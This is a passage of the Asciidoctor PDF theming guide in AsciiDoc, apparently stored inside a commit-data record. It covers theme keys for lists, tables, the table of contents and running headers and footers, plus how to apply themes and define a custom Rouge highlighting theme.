6\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: $vertical_spacing)\n|thematic_break:\n margin_bottom: 18\n|===\n\n[#keys-description-list]\n=== Description List\n\nThe keys in this category control the arrangement and style of definition list items (terms and descriptions).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-description-list]*Key Prefix:* <<key-prefix-description-list,description_list>>\n\n|term_font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|description_list:\n term_font_style: italic\n\n|term_spacing\n|<<measurement-units,Measurement>> +\n(default: 4)\n|description_list:\n term_spacing: 5\n\n|description_indent\n|<<values,Number>> +\n(default: 30)\n|description_list:\n description_indent: 15\n|===\n\n[#keys-outline-list]\n=== Outline List\n\nThe keys in this category control the arrangement and style of outline list items.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-outline-list]*Key Prefix:* <<key-prefix-outline-list,outline_list>>\n\n|indent\n|<<measurement-units,Measurement>> +\n(default: 30)\n|outline_list:\n indent: 40\n\n|item_spacing\n|<<measurement-units,Measurement>> +\n(default: 6)\n|outline_list:\n item_spacing: 4\n\n|marker_font_color^[1]^\n|<<colors,Color>> +\n(default: _inherit_)\n|outline_list:\n marker_font_color: #3c763d \n\n|text_align^[2]^\n|<<text-alignments,Text alignment>> +\n(default: $base_align)\n|outline_list:\n text_align: left\n|===\n\n. Controls the color of the bullet glyph that marks items in unordered lists and the number for items in ordered lists.\n. Controls the alignment of the list text only, not nested content (blocks or lists).\n\n[#keys-ulist]\n=== Unordered List\n\nThe keys in this category control the arrangement and style of unordered list items.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-ulist-marker]*Key Prefix:* <<key-prefix-ulist-marker,ulist_marker>>\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist:\n marker:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n font_size: 9\n\n|font_color\n|<<colors,Color>> +\n(default: $outline_list_marker_font_color)\n|ulist:\n marker:\n font_color: #cccccc\n\n|line_height\n|<<values,Number>> +\n(default: $base_line_height)\n|ulist:\n marker:\n line_height: 1.5\n|===\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|*Key Prefix:* ulist_marker_<type>^[1]^\n\n|content\n|<<quoted-string,Quoted string>>\n|ulist:\n marker:\n disc:\n content: \"\\uf140\"\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font_family: fa\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font_size: 9\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n font_color: #ff0000\n\n|line_height\n|<<values,Number>> +\n(default: _inherit_)\n|ulist:\n marker:\n disc:\n line_height: 2\n|===\n\n. <type> is one of disc, square, circle, checked, unchecked\n\n[#keys-table]\n=== Table\n\nThe keys in this category control the arrangement and style of tables and table cells.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-table]*Key Prefix:* <<key-prefix-table,table>>\n\n|background_color\n|<<colors,Color>> +\n(default: transparent)\n|table:\n background_color: #ffffff\n\n|border_color\n|<<colors,Color>> +\n(default: #000000)\n|table:\n border_color: #dddddd\n\n|border_style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n border_style: solid\n\n|border_width\n|<<values,Number>> +\n(default: 0.5)\n|table:\n border_width: 0.5\n\n|caption_side\n|top {vbar} bottom +\n(default: top)\n|table:\n caption_side: bottom\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|table:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|table:\n font_family: Helvetica\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|table:\n font_size: 9.5\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|table:\n font_style: italic\n\n|grid_color\n|<<colors,Color>> +\n(default: $table_border_color)\n|table:\n grid_color: #eeeeee\n\n|grid_style\n|solid {vbar} dashed {vbar} dotted +\n(default: solid)\n|table:\n grid_style: dashed\n\n|grid_width\n|<<values,Number>> +\n(default: $table_border_width)\n|table:\n grid_width: 0.5\n\n3+|[#key-prefix-table-head]*Key Prefix:* <<key-prefix-table-head,table_head>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: _inherit_)\n\/\/|table:\n\/\/ head:\n\/\/ align: center\n\n|background_color\n|<<colors,Color>> +\n(default: $table_background_color)\n|table:\n head:\n background_color: #f0f0f0\n\n|font_color\n|<<colors,Color>> +\n(default: $table_font_color)\n|table:\n head:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $table_font_family)\n|table:\n head:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $table_font_size)\n|table:\n head:\n font_size: 10\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|table:\n head:\n font_style: normal\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|table:\n head:\n text_transform: uppercase\n\n3+|[#key-prefix-table-body]*Key Prefix:* <<key-prefix-table-body,table_body>>\n\n|background_color\n|<<colors,Color>> +\n(default: $table_background_color)\n|table:\n body:\n background_color: #fdfdfd\n\n|stripe_background_color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|table:\n body:\n stripe_background_color: #efefef\n\n3+|[#key-prefix-table-foot]*Key Prefix:* <<key-prefix-table-foot,table_foot>>\n\n|background_color\n|<<colors,Color>> +\n(default: $table_background_color)\n|table:\n foot:\n background_color: #f0f0f0\n\n|font_color\n|<<colors,Color>> +\n(default: $table_font_color)\n|table:\n foot:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $table_font_family)\n|table:\n foot:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $table_font_size)\n|table:\n foot:\n font_size: 10\n\n|font_style\n|<<font-styles,Font style>> +\n(default: normal)\n|table:\n foot:\n font_style: italic\n\n\/\/deprecated\n\/\/3+|[#key-prefix-table-row]*Key Prefix:* <<key-prefix-table-row,table_<parity>_row>>^[1]^\n\/\/\n\/\/|background_color\n\/\/|<<colors,Color>> +\n\/\/(default: $table_background_color)\n\/\/|table:\n\/\/ even_row:\n\/\/ background_color: #f9f9f9\n\n3+|[#key-prefix-table-cell]*Key Prefix:* <<key-prefix-table-cell,table_cell>>\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 2)\n|table:\n cell:\n padding: 3\n\n3+|[#key-prefix-table-header-cell]*Key Prefix:* <<key-prefix-table-header-cell,table_header_cell>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: $table_head_align)\n\/\/|table:\n\/\/ header_cell:\n\/\/ align: center\n\n|background_color\n|<<colors,Color>> +\n(default: $table_head_background_color)\n|table:\n header_cell:\n background_color: #f0f0f0\n\n|font_color\n|<<colors,Color>> +\n(default: $table_head_font_color)\n|table:\n header_cell:\n font_color: #1a1a1a\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $table_head_font_family)\n|table:\n header_cell: \n font_family: Noto Sans\n\n|font_size\n|<<values,Number>> +\n(default: $table_head_font_size)\n|table:\n header_cell:\n font_size: 12\n\n|font_style\n|<<font-styles,Font style>> +\n(default: $table_head_font_style)\n|table:\n header_cell:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $table_head_text_transform)\n|table:\n header_cell:\n text_transform: uppercase\n|===\n. Applied to even rows by default; controlled using `stripes` attribute (even, odd, all, none) on table.\n\/\/. `<parity>` can be `odd` (odd rows) or `even` (even rows).\n\n[#keys-table-of-contents]\n=== Table of Contents (TOC)\n\nThe keys in this category control the arrangement and style of the table of contents.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-toc]*Key Prefix:* <<key-prefix-toc,toc>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|toc:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n\/\/ QUESTION why is the default not inherited?\n(default: normal)\n|toc:\n font_style: bold\n\n|text_decoration\n|none {vbar} underline +\n(default: none)\n|toc:\n text_decoration: underline\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.4)\n|toc:\n line_height: 1.5\n\n|indent\n|<<measurement-units,Measurement>> +\n(default: 15)\n|toc:\n indent: 20\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|toc:\n margin_top: 0\n\n3+|[#key-prefix-toc-level]*Key Prefix:* <<key-prefix-toc-level,toc_h<n> >>^[1]^\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n h3_font_color: #999999\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|toc:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|toc:\n font_style: italic\n\n|text_decoration\n|none {vbar} underline +\n(default: _inherit_)\n|toc:\n text_decoration: none\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n text_transform: uppercase\n\n3+|[#key-prefix-toc-title]*Key Prefix:* <<key-prefix-toc-title,toc_title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $heading_h2_align)\n|toc:\n title:\n align: right\n\n|font_color\n|<<colors,Color>> +\n(default: $heading_h2_font_color)\n|toc:\n title:\n font_color: #aa0000\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $heading_h2_font_family)\n|toc:\n title:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $heading_h2_font_size)\n|toc:\n title:\n font_size: 18\n\n|font_style\n|<<font-styles,Font style>> +\n(default: $heading_h2_font_style)\n|toc:\n title:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $heading_h2_text_transform)\n|sidebar:\n title:\n text_transform: uppercase\n\n3+|[#key-prefix-toc-dot-leader]*Key Prefix:* <<key-prefix-toc-dot-leader,toc_dot_leader>>\n\n|content\n|<<quoted-string,Quoted string>> +\n(default: '. ')\n|toc:\n dot_leader:\n content: \". \"\n\n|font_color^[2]^\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n dot_leader:\n font_color: #999999\n\n|font_style^[2]^\n|<<font-styles,Font style>> +\n(default: normal)\n|toc:\n dot_leader:\n font_style: bold\n\n|levels^[3]^\n|all {vbar} none {vbar} Integers (space-separated) +\n(default: all)\n|toc:\n dot_leader:\n levels: 2 3\n|===\n\n. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.\n. The dot leader inherits all font properties except `font_style` from the root `toc` category.\n. 0-based levels (e.g., part = 0, chapter = 1).\nDot leaders are only shown for the specified levels.\nIf value is not specified, dot leaders are shown for all levels.\n\n[#keys-running-content]\n=== Running Content (Header & Footer)\n\nThe keys in this category control the arrangement and style of running header and footer content.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-header]*Key Prefix:* <<key-prefix-header,header>>\n\n|background_color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n background_color: #eeeeee\n\n|border_color\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n border_color: #dddddd\n\n|border_style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|header:\n border_style: dashed\n\n|border_width\n|<<measurement-units,Measurement>> +\n(default: $base_border_width)\n|header:\n border_width: 0.25\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|header:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|header:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|header:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|header:\n font_style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n height: 0.75in\n\n|line_height\n|<<values,Number>> +\n(default: $base_line_height)\n|header:\n line_height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|header:\n padding: [0, 3, 0, 3]\n\n|image_vertical_align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n image_vertical_align: 4\n\n|vertical_align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|header:\n vertical_align: center\n\n|<side>_columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|header:\n recto:\n columns: <25% =50% >25%\n\n|<side>_<position>_content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|header:\n recto:\n left:\n content: '\\{page-number}'\n\n3+|[#key-prefix-footer]*Key Prefix:* <<key-prefix-footer,footer>>\n\n|background_color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|footer:\n background_color: #eeeeee\n\n|border_color\n|<<colors,Color>> +\n(default: _not set_)\n|footer:\n border_color: #dddddd\n\n|border_style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|footer:\n border_style: dashed\n\n|border_width\n|<<measurement-units,Measurement>> +\n(default: $base_border_width)\n|footer:\n border_width: 0.25\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|footer:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|footer:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|footer:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|footer:\n font_style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n height: 0.75in\n\n|line_height\n|<<values,Number>> +\n(default: $base_line_height)\n|footer:\n line_height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|footer:\n padding: [0, 3, 0, 3]\n\n|image_vertical_align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n image_vertical_align: 4\n\n|vertical_align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|footer:\n vertical_align: top\n\n|<side>_columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|footer:\n verso:\n columns: <50% =0% <50%\n\n|<side>_<position>_content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|footer:\n verso:\n center:\n content: '\\{page-number}'\n|===\n. The background color spans the width of the page, as does the border when a background color is specified.\n. If the height is not set, the running content at this periphery is disabled.\n. If the side padding is negative, the content will bleed into the margin of the page.\n. `<side>` can be `recto` (right-hand, odd-numbered pages) or `verso` (left-hand, even-numbered pages).\nWhere the page sides fall in relation to the physical or printed page number is controlled using the `pdf-folio-placement` attribute (except when `media=prepress`, which implies `physical`).\n. `<position>` can be `left`, `center` or `right`.\n\nIMPORTANT: You must define a height for the running header or footer, respectively, or it will not be shown.\n\nIf you define running header and footer content in your theme, you can still disable this content per document by setting the `noheader` and `nofooter` attributes in the AsciiDoc document header, respectively.\n\nIf content is not specified for the running footer, the page number (i.e., `\\{page-number}`) is shown on the left on verso pages and the right on recto pages.\nYou can disable this behavior by defining the attribute `nofooter` in the AsciiDoc document header or by defining the key `footer_<side>_content: none` in the theme.\n\nTIP: Although not listed in the table above, you can control the font properties used for running content for each column position on each page side (e.g., `footer_<side>_<position>_font_color`).\nFor example, you can set the font color used for the right-hand column on recto pages by setting `footer_recto_right_font_color: 6CC644`.\n\n==== Attribute References\n\nYou can use _any_ attribute defined in your AsciiDoc document (such as `doctitle`) in the content of the running header and footer.\nIn addition, the following attributes are also available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* part-title\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nYou can also built-in AsciiDoc text replacements like `+(C)+`, numeric character references like `+©+` and inline formatting (e.g., bold, italic, monospace).\n\nHere's an example that shows how attributes and replacements can be used in the running footer:\n\n[source,yaml]\n----\nheader:\n height: 0.75in\n line_height: 1\n recto:\n center:\n content: '(C) ACME -- v{revnumber}, {docdate}'\n verso:\n center:\n content: $header_recto_center_content\nfooter:\n height: 0.75in\n line_height: 1\n recto:\n right:\n content: '{section-or-chapter-title} | *{page-number}*'\n verso:\n left:\n content: '*{page-number}* | {chapter-title}'\n----\n\nYou can split the content value across multiple lines using YAML's multiline string syntax.\nIn this case, the single quotes around the string are not necessary.\nTo force a hard line break in the output, add `{sp}+` to the end of the line in normal AsciiDoc fashion.\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n line_height: 1.2\n recto:\n right:\n content: |\n Section Title - Page Number +\n {section-or-chapter-title} - {page-number}\n verso:\n left:\n content: |\n Page Number - Chapter Title +\n {page-number} - {chapter-title}\n----\n\nTIP: You can use most AsciiDoc inline formatting in the values of these keys.\nFor instance, to make the text bold, surround it in asterisks (as shown above).\nOne exception to this rule are inline images, which are described in the next section.\n\n==== Images\n\nYou can add an image to the running header or footer using the AsciiDoc inline image syntax.\nNote that the image must be the whole value for a given position (left, center or right).\nIt cannot be combined with text.\n\nHere's an example of how to use an image in the running header (which also applies for the footer).\n\n[source,yaml,subs=attributes+]\n----\nheader:\n height: 0.75in\n image_vertical_align: 2 {conum-guard-yaml} <1>\n recto:\n center:\n content: image:footer-logo.png[width=80]\n verso:\n center:\n content: $header_recto_center_content\n----\n<1> You can use the `footer_vertical_align` attribute to slighly nudge the image up or down.\n\nCAUTION: By default, the image must fit in the allotted space for the running header or footer.\nOtherwise, you will run into layout issues.\nAdjust the width attribute accordingly using the `pdfwidth` attribute.\nAlternatively, you can set the `fit` attribute to `scale-down` (e.g., `fit=scale-down`) to reduce the image size to fit in the available space or `contain` (e.g., `fit=contain`) to resize the image to the maximum size that will fit.\n\n== Applying Your Theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis is done using AsciiDoc attributes.\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-stylesdir:: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n+\nIf you use images in your theme, image paths are resolved relative to this directory.\n\npdf-style:: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file.\nOtherwise, `-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`).\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-stylesdir=resources\/themes -a pdf-style=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nYou can skip setting the `pdf-stylesdir` attribute and just pass the absolute path of your theme file to the `pdf-style` attribute.\n\n $ asciidoctor-pdf -a pdf-style=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nHowever, in this case, image paths in your theme won't be resolved properly.\n\nPaths are resolved relative to the current directory.\nHowever, in the future, this may change so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommend that you specify absolute paths for now to future-proof your configuration.\n\n $ asciidoctor-pdf -a pdf-stylesdir=\/path\/to\/resources\/themes -a pdf-style=basic -a pdf-fontsdir=\/path\/to\/resources\/fonts\n\nAs usual, you can also use build tools like Maven and Gradle to build a themed PDF.\nThe only thing you need to add to an existing build is the attributes mentioned above.\n\n* https:\/\/github.com\/asciidoctor\/asciidoctor-maven-examples\/tree\/master\/asciidoctor-pdf-with-theme-example[Maven Example]\n* https:\/\/github.com\/asciidoctor\/asciidoctor-gradle-examples\/tree\/master\/asciidoc-to-pdf-with-theme-example[Gradle Example]\n\n== Theme-Related Document Attributes\n\nThere are various settings in the theme you control using document attributes.\nThese settings override equivalent keys defined in the theme file, where applicable.\n\n[cols=\"2,3,6l\"]\n|===\n|Attribute |Value Type |Example\n\n|autofit-option\n|flag (default: _not set_)\n|:autofit-option:\n\n|chapter-label\n|string (default: Chapter)\n|:chapter-label: Chapitre\n\n|<face>-cover-image^[1]^\n|path^[2]^ {vbar} image macro^[3]^ +\n(format can be image or PDF)\n|:front-cover-image: image:front-cover.pdf[]\n\n|media\n|screen {vbar} print {vbar} prepress\n|:media: prepress\n\n|page-background-image^[4]^\n|path^[2]^ {vbar} image macro^[3]^\n|:page-background-image: image:bg.jpg[]\n\n|pagenums^[5]^\n|flag (default: _set_)\n|:pagenums:\n\n|pdf-page-layout\n|portrait {vbar} landscape\n|:pdf-page-layout: landscape\n\n|pdf-page-margin\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>\n|:pdf-page-margin: [1in, 0.5in]\n\n|pdf-page-size\n|https:\/\/github.com\/prawnpdf\/pdf-core\/blob\/0.6.0\/lib\/pdf\/core\/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width, height]>>\n|:pdf-page-size: 6in x 9in\n\n|pdf-folio-placement\n|virtual {vbar} virtual-inverted {vbar} physical {vbar} physical-inverted\n|:pdf-folio-placement: physical\n\n|pdfmark^[6]^\n|flag (default: _not set_)\n|:pdfmark:\n\n|text-alignment^[7]^\n|<<text-alignments,Text alignment>>\n|:text-alignment: left\n\n|title-logo-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-logo-image: image:logo.png[top=25%, align=center, pdfwidth=0.5in]\n\n|title-page^[8]^\n|flag (default: _not set_)\n|:title-page:\n\n|title-page-background-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-page-background-image: image:title-bg.jpg[]\n|===\n\n. `<face>` can be `front` or `back`.\n. The path is resolved relative to base_dir.\n. The target of the image macro is resolved relative to `imagesdir`.\nIf the image macro syntax is not used, the value is resolved relative to the base directory, which defaults to the document directory.\n. Page background images are automatically scaled to fit within the bounds of the page.\n+\nNOTE: Page backgrounds do not currently work when using AsciidoctorJ PDF.\nThis limitation is due to a bug in Prawn 1.3.1.\nThe limitation will remain until AsciidoctorJ PDF upgrades to Prawn 2.x (an upgrade that is waiting on AsciidoctorJ to migrate to JRuby 9000).\nFor more details, see http:\/\/discuss.asciidoctor.org\/Asciidoctor-YAML-style-file-for-PDF-and-maven-td3849.html[this thread].\n. Controls whether the `page-number` attribute is accessible to the running header and footer content specified in the theme file.\nUse the `noheader` and `nofooter` attributes to disable the running header and footer, respectively, from the document.\n. Enables generation of the http:\/\/milan.kupcevic.net\/ghostscript-ps-pdf\/#marks[pdfmark] file, which contains metadata that is fed to Ghostscript when optimizing the PDF file.\n. _(Experimental)_ The `text-alignment` document attribute is intended as a simple way to toggle text justification.\nThe value of this attribute overrides the `base_align` key set by the theme.\nFor more fine-grained control, you should customize using the theme.\n. Force a title page to be added even when the doctype is not book.\n\n== Publishing Mode\n\nAsciidoctor PDF provides the following features to assist with publishing:\n\n* Double-sided (mirror) page margins\n* Automatic facing pages\n\nThese features are activated when you set the `media` attribute to `prepress` in the header of your AsciiDoc document or from the CLI or API.\nThe following sections describe the behaviors that this setting activates.\n\n=== Double-Sided Page Margins\n\nThe page margins for the recto (right-hand, odd-numbered) and verso (left-hand, even-numbered) pages are automatically calculated by replacing the side page margins with the values of the `page_margin_inner` and `page_margin_outer` keys.\n\nFor example, let's assume you've defined the following settings in your theme:\n\n[source,yaml]\n----\npage:\n margin: [0.5in, 0.67in, 0.67in, 0.67in]\n margin_inner: 0.75in\n margin_outer: 0.59in\n----\n\nThe page margins for the recto and verso pages will be resolved as follows:\n\nrecto page margin:: [0.5in, *0.59in*, 0.67in, *0.75in*]\nverso page margin:: [0.5in, *0.75in*, 0.67in, *0.59in*]\n\nThe page margins alternate between recto and verso.\nThe first page in the document is a recto page.\n\n=== Automatic Facing Pages\n\nWhen converting the book doctype using the prepress media setting, a blank page will be inserted when necessary to ensure the following elements start on a recto page:\n\n* Title page\n* Table of contents\n* First page of body\n* Parts and chapters\n\nOther \"`facing`\" pages may be added in the future.\n\nIt's possible to disable the automatic facing feature for a given part or chapter.\nThis can be done by adding the nonfacing option to the section node.\nWhen the nonfacing option is present, the part or chapter title will be placed on the following page.\n\n[source,asciidoc]\n----\n[%nonfacing]\n= Minor Chapter\n\ncontent\n----\n\nFor documents that use the article doctype, Asciidoctor PDF incorrectly places the document title and table of contents on their own pages.\nThis can result in the page numbering and the page facing to be out of sync.\nAs a workaround, Asciidoctor PDF inserts a blank page, if necessary, to ensure the first page of body content is a recto-facing page.\n\nYou can check on the status of this defect by following https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/95[issue #95].\n\n== Source Highlighting Theme\n\nYou can define and apply your own source highlighting theme to source blocks when using Rouge as the source highlighter.\nThis section explains how.\n\nA custom theme for Rouge is defined using a Ruby class.\nStart by creating a Ruby source file to define your theme.\nName the file according to the name of your theme and put the file in a folder of your choice (e.g., [.path]_rouge_themes\/custom.rb_).\nThe name of the Ruby class doesn't matter, though it's customary to name it according to the name of the theme as well.\n\n.rouge_themes\/custom.rb\n[source,ruby]\n----\nrequire 'rouge' unless defined? ::Rouge.version\n\nmodule Rouge; module Themes\n class Custom < CSSTheme\n name 'custom'\n\n style Comment, fg: '#008800', italic: true\n style Error, fg: '#a61717', bg: '#e3d2d2'\n style Str, fg: '#0000ff'\n style Str::Char, fg: '#800080'\n style Num, fg: '#0000ff'\n style Keyword, fg: '#000080', bold: true\n style Operator::Word, bold: true\n style Name::Tag, fg: '#000080', bold: true\n style Name::Attribute, fg: '#ff0000'\n style Generic::Deleted, fg: '#000000', bg: '#ffdddd', inline_block: true, extend: true\n style Generic::Inserted, fg: '#000000', bg: '#ddffdd', inline_block: true, extend: true\n style Text, {}\n end\nend; end\n----\n\nEach style declaration accepts the following properties:\n\n* `fg` - sets the foreground (text) color\n* `bg` - sets the background color\n* `bold` - change the font weight to bold\n* `italic` - change the font style to italic\n* `underline` - add an underline to the text\n* `inline_block` - fill the background color to the height of the line (Asciidoctor PDF only)\n* `extend` - extend the background color to the end of the line for a line-oriented match (Asciidoctor PDF only)\n\nColors are defined using hexidecimal format (e.g., #ff0000 for red).\n\nUse the `Text` token to set the background color of the source block and the default text color.\n\nThe complete list of tokens can be found in the https:\/\/github.com\/jneen\/rouge\/blob\/master\/lib\/rouge\/token.rb[token.rb] file from Rouge.\nRefer to the https:\/\/github.com\/jneen\/rouge\/tree\/master\/lib\/rouge\/themes[bundled themes] to find more examples.\n\nOnce you've defined your theme, you need to enable it use it using the `rouge-style` document attribute, which you specify in the document header or via the Asciidoctor CLI or API.\n\n[source,asciidoc]\n----\n:source-highlighter: rouge\n:rouge-style: custom\n----\n\nFinally, you need to active your theme by requiring the theme file when you invoke Asciidoctor.\n\n $ asciidoctor -r .\/rouge_themes\/custom.rb sample.adoc\n\nYou should now see that the source code is highlighted to your liking.\nFor more information about source highlighting with Rouge, refer to the http:\/\/rouge.jneen.net\/[Rouge project page].\n\n\/\/\/\/\n== Resources for Extending Asciidoctor PDF\n\n* http:\/\/www.sitepoint.com\/hackable-pdf-typesetting-in-ruby-with-prawn[Hackable PDF typesetting in Ruby with Prawn]\n\/\/\/\/\n","old_contents":"= Asciidoctor PDF Theming Guide\nDan Allen <https:\/\/github.com\/mojavelinux[@mojavelinux]>\n\/\/ Settings:\n:idprefix:\n:idseparator: -\n:toc: preamble\nifndef::env-github[:icons: font]\nifdef::env-github[]\n:outfilesuffix: .adoc\n:!toc-title:\n:caution-caption: :fire:\n:important-caption: :exclamation:\n:note-caption: :paperclip:\n:tip-caption: :bulb:\n:warning-caption: :warning:\nendif::[]\n:window: _blank\n\/\/ Aliases:\n:conum-guard-yaml: #\nifndef::icons[:conum-guard-yaml: # #]\nifdef::backend-pdf[:conum-guard-yaml: # #]\n\n\/\/\/\/\nTopics remaining to document:\n* line height and line height length (and what that all means)\n* title page layout \/ title page images (logo & background)\n* document that unicode escape sequences can be used inside double-quoted strings\n\/\/\/\/\n\n[.lead]\nThe theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file Asciidoctor PDF generates from AsciiDoc.\nThis document describes how the theming system works, how to define a custom theme in YAML and how to activate the theme when running Asciidoctor PDF.\n\nIMPORTANT: If you're creating a custom theme, you're expected to supply your own fonts.\nWe recognize this can be a major obstacle when you're starting out.\nTherefore, your other option is to simply redeclare the fonts from the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default theme] in the <<Custom Fonts,font catalog>>.\nAsciidoctor PDF will then resolve the fonts that are bundled with the gem.\n\nWARNING: If you don't declare your own fonts, the built-in (AFM) fonts declared in 